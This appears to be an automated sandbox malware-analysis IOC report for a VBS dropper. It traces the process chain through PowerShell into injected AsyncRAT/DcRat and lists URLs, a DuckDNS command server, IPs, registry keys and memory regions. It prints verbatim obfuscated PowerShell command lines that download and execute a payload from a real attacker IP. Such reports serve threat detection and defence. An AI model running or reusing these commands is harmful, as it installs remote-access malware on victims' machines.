Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"

Details

Is windows:	true
Is dropped:	false
PID:	5332
Target ID:	0
Parent PID:	2580
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	00:29:53
Date:	01/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7aa200000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;

Details

Is windows:	true
Is dropped:	false
PID:	3848
Target ID:	1
Parent PID:	5332
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	00:29:54
Date:	01/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff788560000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected AsyncRAT	Key, Mouse, Clipboard, Microphone and Screen Capturing, Boot Survival, Malware Analysis System Evasion, Lowering of HIPS / PFW / Operating System Security Settings	Scheduled Task/Job Obfuscated Files or Information
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Yara detected Generic Downloader	Networking
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: PowerShell Download Pattern	System Summary
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"

Details

Is windows:	true
Is dropped:	false
PID:	4312
Target ID:	3
Parent PID:	3848
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	00:29:55
Date:	01/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff788560000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected AsyncRAT	Key, Mouse, Clipboard, Microphone and Screen Capturing, Boot Survival, Malware Analysis System Evasion, Lowering of HIPS / PFW / Operating System Security Settings	Scheduled Task/Job Obfuscated Files or Information
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Yara detected Generic Downloader	Networking
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: PowerShell Download Pattern	System Summary
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Details

Is windows:	true
Is dropped:	false
PID:	6884
Target ID:	4
Parent PID:	4312
Name:	RegSvcs.exe
Class:	system-tools
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Size:	45984
MD5:	9D352BC46709F0CB5EC974633A0C3C94
Time:	00:29:57
Date:	01/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0xdc0000
Modulesize:	57344
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Yara detected AsyncRAT	Key, Mouse, Clipboard, Microphone and Screen Capturing, Boot Survival, Malware Analysis System Evasion, Lowering of HIPS / PFW / Operating System Security Settings	Scheduled Task/Job Obfuscated Files or Information
Yara detected DcRat	Stealing of Sensitive Information, Remote Access Functionality
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Potentially Suspicious Malware Callback Communication	System Summary
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	1880
Target ID:	2
Parent PID:	3848
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	00:29:54
Date:	01/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7699e0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

)8"zc

http://91.202.233.169

unknown

http://91.202.233.169/Tak/Reg/Marz/DRG/R

unknown

http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt

91.202.233.169

http://91.202.233.169/Tak/Reg/Marz/Ex

unknown

http://nuget.org/NuGet.exe

unknown

http://pesterbdd.com/images/Pester.png

unknown

http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3Pe.txt

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

http://91.202.H

unknown

https://go.micro

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://contoso.com/License

unknown

https://contoso.com/Icon

unknown

HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DJ1.TXT

unknown

https://aka.ms/pscore68

unknown

http://91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://github.com/Pester/Pester

unknown

There are 10 hidden URLs, click here to show them.

Domains

Name

Malicious

dczas.duckdns.org

89.117.23.22

Details

Name:	dczas.duckdns.org
IP:	89.117.23.22
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Sigma detected: Potentially Suspicious Malware Callback Communication	System Summary
Uses dynamic DNS services	Networking	Application Layer Protocol
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

91.202.233.169

unknown

Russian Federation

Details

IP:	91.202.233.169
TargetID:	3
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Russian Federation
Countrycode:	RUS
ASN number:	9009
ASN name:	M247GB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Sigma detected: PowerShell Download Pattern	System Summary
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Suricata IDS alerts with low severity for network traffic	Networking
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

89.117.23.22

dczas.duckdns.org

Lithuania

Details

IP:	89.117.23.22
TargetID:	4
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Country:	Lithuania
Countrycode:	LTU
ASN number:	15419
ASN name:	LRTC-ASLT
Private:	false
Domain:	dczas.duckdns.org

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Sigma detected: Potentially Suspicious Malware Callback Communication	System Summary
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum

Version

There are 5 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

18504E7A000

trusted library allocation

page read and write

402000

remote allocation

page execute and read and write

1851CFD0000

trusted library section

page read and write

3181000

trusted library allocation

page read and write

31E1000

trusted library allocation

page read and write

6A23C3E000

stack

page read and write

7FFD9BA00000

trusted library allocation

page read and write

2757EB34000

heap

page read and write

7FFD9B930000

trusted library allocation

page execute and read and write

7FFD9B940000

trusted library allocation

page execute and read and write

2757EB43000

heap

page read and write

848CBFF000

stack

page read and write

848C2FA000

stack

page read and write

CA35BFE000

stack

page read and write

7FFD9B955000

trusted library allocation

page read and write

30F0000

heap

page read and write

CA353DE000

stack

page read and write

2757EB15000

heap

page read and write

598E000

stack

page read and write

CA3539E000

stack

page read and write

22443A7E000

heap

page read and write

6A233EE000

stack

page read and write

CA3587E000

stack

page read and write

2757F628000

heap

page read and write

573E000

stack

page read and write

6A237FE000

stack

page read and write

1851CE40000

heap

page execute and read and write

7FFD9B77D000

trusted library allocation

page execute and read and write

185062A2000

trusted library allocation

page read and write

6A2478D000

stack

page read and write

7FFD9B970000

trusted library allocation

page read and write

CA35AFE000

stack

page read and write

2757F817000

heap

page read and write

1210000

heap

page read and write

5C5E000

stack

page read and write

7FFD9BA30000

trusted library allocation

page read and write

22443A29000

heap

page read and write

2757EB0F000

heap

page read and write

1250000

heap

page read and write

1850484C000

heap

page read and write

6F2E000

stack

page read and write

1851D050000

heap

page read and write

31D1000

trusted library allocation

page read and write

18502D90000

heap

page read and write

18502D94000

heap

page read and write

7FFD9B82C000

trusted library allocation

page execute and read and write

224439E0000

heap

page read and write

5BF9000

trusted library allocation

page read and write

1851D02E000

heap

page read and write

105C000

stack

page read and write

2757EB42000

heap

page read and write

69AD000

stack

page read and write

18504E75000

trusted library allocation

page read and write

14F3000

heap

page read and write

3215000

trusted library allocation

page read and write

7FFD9BAB0000

trusted library allocation

page read and write

7FFD9B952000

trusted library allocation

page read and write

2757F811000

heap

page read and write

848C7FF000

stack

page read and write

224456EB000

trusted library allocation

page read and write

2245DAC0000

heap

page read and write

6A6C000

stack

page read and write

7FFD9B980000

trusted library allocation

page read and write

22443B60000

trusted library allocation

page read and write

13B7000

trusted library allocation

page execute and read and write

31C3000

trusted library allocation

page read and write

5E0E000

stack

page read and write

3170000

heap

page read and write

7FFD9BA30000

trusted library allocation

page read and write

13B2000

trusted library allocation

page read and write

3211000

trusted library allocation

page read and write

7FFD9B9C0000

trusted library allocation

page read and write

18504BE1000

trusted library allocation

page read and write

1846000

heap

page read and write

1840000

heap

page read and write

1851CD9F000

heap

page read and write

7FFD9BA70000

trusted library allocation

page read and write

3213000

trusted library allocation

page read and write

7FFD9B830000

trusted library allocation

page execute and read and write

18502CD0000

heap

page read and write

22443AA6000

heap

page read and write

1255000

heap

page read and write

31E6000

trusted library allocation

page read and write

31CF000

trusted library allocation

page read and write

7FFD9B92A000

trusted library allocation

page read and write

2757EAE0000

heap

page read and write

2757EAB5000

heap

page read and write

22445702000

trusted library allocation

page read and write

18502D9A000

heap

page read and write

2245D95F000

heap

page read and write

69EE000

stack

page read and write

13BB000

trusted library allocation

page execute and read and write

7FFD9B774000

trusted library allocation

page read and write

2757EB57000

heap

page read and write

31E8000

trusted library allocation

page read and write

18505FD1000

trusted library allocation

page read and write

7FFD9B990000

trusted library allocation

page read and write

7FFD9B856000

trusted library allocation

page execute and read and write

2245D9DA000

heap

page read and write

7FFD9B92A000

trusted library allocation

page read and write

7FFD9B77D000

trusted library allocation

page execute and read and write

848C3FE000

stack

page read and write

22443AAD000

heap

page read and write

68AC000

stack

page read and write

7FFD9BA20000

trusted library allocation

page read and write

1380000

trusted library allocation

page read and write

7FFD9BA90000

trusted library allocation

page read and write

18504830000

heap

page read and write

40E000

remote allocation

page execute and read and write

56FE000

stack

page read and write

6A23AB8000

stack

page read and write

CA3531E000

stack

page read and write

7FFD9B990000

trusted library allocation

page read and write

31BD000

trusted library allocation

page read and write

224456F4000

trusted library allocation

page read and write

7FFD9B970000

trusted library allocation

page read and write

7FFD9B774000

trusted library allocation

page read and write

11C0000

heap

page read and write

18504A3E000

trusted library allocation

page read and write

2757EB57000

heap

page read and write

18504790000

heap

page execute and read and write

7FFD9B960000

trusted library allocation

page execute and read and write

CA357FE000

stack

page read and write

18502CC0000

heap

page read and write

5C05000

trusted library allocation

page read and write

7FFD9BA10000

trusted library allocation

page read and write

142B000

heap

page read and write

7FFD9B960000

trusted library allocation

page execute and read and write

2757E9B0000

heap

page read and write

7FFD9B9A0000

trusted library allocation

page read and write

18506223000

trusted library allocation

page read and write

22445705000

trusted library allocation

page read and write

22443A60000

heap

page read and write

224455D0000

heap

page execute and read and write

7FFD9B772000

trusted library allocation

page read and write

1851CDFA000

heap

page read and write

5BF6000

trusted library allocation

page read and write

2757EB81000

heap

page read and write

22445603000

trusted library allocation

page read and write

31E4000

trusted library allocation

page read and write

316B000

trusted library allocation

page read and write

22445741000

trusted library allocation

page read and write

13AA000

trusted library allocation

page execute and read and write

224555E1000

trusted library allocation

page read and write

2757FBE1000

heap

page read and write

1370000

trusted library allocation

page read and write

30EF000

stack

page read and write

31BA000

trusted library allocation

page read and write

1851CD51000

heap

page read and write

5ACE000

stack

page read and write

22443A6A000

heap

page read and write

7FFD9B9B0000

trusted library allocation

page read and write

31DB000

trusted library allocation

page read and write

1159000

stack

page read and write

148B000

heap

page read and write

6C6E000

stack

page read and write

7FFD9B9D0000

trusted library allocation

page read and write

2757EB2B000

heap

page read and write

CA35B7E000

stack

page read and write

18504720000

heap

page readonly

22443B80000

trusted library allocation

page read and write

6A23B3E000

stack

page read and write

2757EB09000

heap

page read and write

2244562B000

trusted library allocation

page read and write

6A2336E000

stack

page read and write

5BD4000

trusted library allocation

page read and write

7FFD9B780000

trusted library allocation

page read and write

22443A20000

heap

page read and write

2757FA01000

heap

page read and write

2757EFC0000

heap

page read and write

2757EB0D000

heap

page read and write

CA358F9000

stack

page read and write

31D9000

trusted library allocation

page read and write

2757EB80000

heap

page read and write

7FFD9B9F0000

trusted library allocation

page read and write

6A23A3B000

stack

page read and write

18514CBB000

trusted library allocation

page read and write

22443A66000

heap

page read and write

7FFD9B980000

trusted library allocation

page read and write

2757EB6E000

heap

page read and write

6A232E3000

stack

page read and write

1383000

trusted library allocation

page execute and read and write

1384000

trusted library allocation

page read and write

18506216000

trusted library allocation

page read and write

1408000

heap

page read and write

2245D9C3000

heap

page read and write

7FFD9BA40000

trusted library allocation

page read and write

4181000

trusted library allocation

page read and write

2757EB39000

heap

page read and write

CA356FD000

stack

page read and write

7FFD9BA70000

trusted library allocation

page read and write

22443C5E000

heap

page read and write

18502D50000

heap

page read and write

1851CE00000

heap

page execute and read and write

1436000

heap

page read and write

18504835000

heap

page read and write

2757EAB0000

heap

page read and write

7FFD9B890000

trusted library allocation

page execute and read and write

2757EB2D000

heap

page read and write

2245D9CD000

heap

page read and write

7FFD9BA60000

trusted library allocation

page read and write

7FFD9BA50000

trusted library allocation

page read and write

1390000

trusted library allocation

page read and write

5740000

heap

page execute and read and write

1851CD00000

heap

page read and write

185149C1000

trusted library allocation

page read and write

2244566F000

trusted library allocation

page read and write

7FFD9B930000

trusted library allocation

page execute and read and write

5636000

heap

page read and write

1851CFF0000

heap

page read and write

848C9FE000

stack

page read and write

CA35977000

stack

page read and write

2245DA90000

heap

page execute and read and write

7FFD9BAA0000

trusted library allocation

page read and write

7FFD9BA80000

trusted library allocation

page read and write

31DF000

trusted library allocation

page read and write

7FFD9B959000

trusted library allocation

page read and write

22443A6C000

heap

page read and write

3217000

trusted library allocation

page read and write

31DD000

trusted library allocation

page read and write

6040000

trusted library allocation

page read and write

18504E73000

trusted library allocation

page read and write

7DF42E660000

trusted library allocation

page execute and read and write

2244573B000

trusted library allocation

page read and write

13B0000

trusted library allocation

page read and write

2757EB6E000

heap

page read and write

5E55000

heap

page read and write

1851D062000

heap

page read and write

14FB000

heap

page read and write

7FFD9B9B0000

trusted library allocation

page read and write

7FFD9BA20000

trusted library allocation

page read and write

1851CFE0000

trusted library section

page read and write

18504730000

trusted library allocation

page read and write

15FE000

stack

page read and write

7FFD9BA10000

trusted library allocation

page read and write

224555EF000

trusted library allocation

page read and write

7FFD9B820000

trusted library allocation

page read and write

5E30000

heap

page read and write

18502DAC000

heap

page read and write

18504D6C000

trusted library allocation

page read and write

6A2393E000

stack

page read and write

18504710000

trusted library allocation

page read and write

CA3567E000

stack

page read and write

18502D6E000

heap

page read and write

613E000

stack

page read and write

6A2E000

stack

page read and write

7FFD9B82C000

trusted library allocation

page execute and read and write

CA3577E000

stack

page read and write

18502D8C000

heap

page read and write

163E000

stack

page read and write

185030D0000

trusted library allocation

page read and write

13F0000

trusted library allocation

page read and write

1851CD24000

heap

page read and write

120E000

stack

page read and write

16DE000

stack

page read and write

1851CEE0000

heap

page read and write

7FFD9B921000

trusted library allocation

page read and write

3209000

trusted library allocation

page read and write

2757EAC0000

heap

page read and write

2245D920000

heap

page read and write

1851CDE5000

heap

page read and write

3227000

trusted library allocation

page read and write

6A239B6000

stack

page read and write

7FFD9BAD0000

trusted library allocation

page read and write

56AB000

heap

page read and write

224439C0000

heap

page read and write

6030000

heap

page read and write

1330000

heap

page read and write

2757EA90000

heap

page read and write

7FFD9B820000

trusted library allocation

page read and write

185047A0000

trusted library allocation

page read and write

55C0000

heap

page read and write

13E0000

trusted library allocation

page execute and read and write

7FFD9B9D0000

trusted library allocation

page read and write

224456FF000

trusted library allocation

page read and write

2757EB0A000

heap

page read and write

138D000

trusted library allocation

page execute and read and write

CA35A77000

stack

page read and write

7FFD9B912000

trusted library allocation

page read and write

224455E1000

trusted library allocation

page read and write

224456EE000

trusted library allocation

page read and write

1851D037000

heap

page read and write

22455651000

trusted library allocation

page read and write

31CB000

trusted library allocation

page read and write

224456F1000

trusted library allocation

page read and write

7FFD9BA50000

trusted library allocation

page read and write

1438000

heap

page read and write

13A0000

trusted library allocation

page read and write

14DE000

heap

page read and write

1851CE46000

heap

page execute and read and write

224456E8000

trusted library allocation

page read and write

6A23CBE000

stack

page read and write

185058B8000

trusted library allocation

page read and write

31FB000

trusted library allocation

page read and write

7FFD9BA60000

trusted library allocation

page read and write

22445642000

trusted library allocation

page read and write

7FFD9B826000

trusted library allocation

page read and write

18502D57000

heap

page read and write

5E47000

heap

page read and write

22443B20000

heap

page read and write

2757FCE0000

heap

page read and write

2757F430000

heap

page read and write

CA35293000

stack

page read and write

848C4FE000

stack

page read and write

2245DBA0000

heap

page execute and read and write

CA359F9000

stack

page read and write

7FFD9B9E0000

trusted library allocation

page read and write

6A238F9000

stack

page read and write

6A236FD000

stack

page read and write

7FFD9B780000

trusted library allocation

page read and write

185061EE000

trusted library allocation

page read and write

1851D3A0000

heap

page read and write

22443BA0000

trusted library allocation

page read and write

224438E0000

heap

page read and write

2245DA1E000

heap

page read and write

3160000

trusted library allocation

page read and write

6A2470E000

stack

page read and write

6A23D3B000

stack

page read and write

848CAFE000

stack

page read and write

1650000

heap

page read and write

2757EB33000

heap

page read and write

3221000

trusted library allocation

page read and write

13D0000

trusted library allocation

page read and write

7FFD9B773000

trusted library allocation

page execute and read and write

2245DAA0000

heap

page read and write

18504EB0000

trusted library allocation

page read and write

2245DA96000

heap

page execute and read and write

617F000

stack

page read and write

5A8E000

stack

page read and write

18504EB8000

trusted library allocation

page read and write

6E2C000

stack

page read and write

7FFD9B9C0000

trusted library allocation

page read and write

2245D9F7000

heap

page read and write

5BE4000

trusted library allocation

page read and write

1400000

heap

page read and write

848CCFB000

stack

page read and write

185149D0000

trusted library allocation

page read and write

7FFD9B78B000

trusted library allocation

page read and write

18505FD7000

trusted library allocation

page read and write

22443C55000

heap

page read and write

31EB000

trusted library allocation

page read and write

7FFD9B9E0000

trusted library allocation

page read and write

22443B90000

heap

page readonly

CA35CFC000

stack

page read and write

1851CDA1000

heap

page read and write

527D000

stack

page read and write

1851D005000

heap

page read and write

224455FB000

trusted library allocation

page read and write

2757EB16000

heap

page read and write

22445AA4000

trusted library allocation

page read and write

18502DD4000

heap

page read and write

185047D0000

trusted library allocation

page read and write

6A2367E000

stack

page read and write

18514A31000

trusted library allocation

page read and write

2757EB32000

heap

page read and write

3229000

trusted library allocation

page read and write

2757EB35000

heap

page read and write

185030F5000

heap

page read and write

2757EB31000

heap

page read and write

6A23BBE000

stack

page read and write

7FFD9BAC0000

trusted library allocation

page read and write

22443C06000

heap

page read and write

22443A5E000

heap

page read and write

4187000

trusted library allocation

page read and write

13A6000

trusted library allocation

page execute and read and write

2757EB57000

heap

page read and write

3169000

trusted library allocation

page read and write

848C6FE000

stack

page read and write

321F000

trusted library allocation

page read and write

7FFD9B773000

trusted library allocation

page execute and read and write

7FFD9B921000

trusted library allocation

